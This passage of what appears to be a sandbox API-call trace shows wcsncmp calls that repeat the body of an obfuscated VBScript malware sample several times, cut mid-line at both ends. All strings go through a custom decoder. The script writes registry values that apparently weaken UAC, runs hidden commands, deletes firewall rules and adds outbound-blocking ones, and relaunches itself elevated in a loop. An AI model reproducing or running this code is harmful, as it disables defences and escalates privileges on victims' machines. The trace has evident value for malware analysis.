bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.320] wcsncmp (_String1="str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.320] wcsncmp (_String1="tr1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.320] wcsncmp (_String1="r1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.320] wcsncmp (_String1="1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 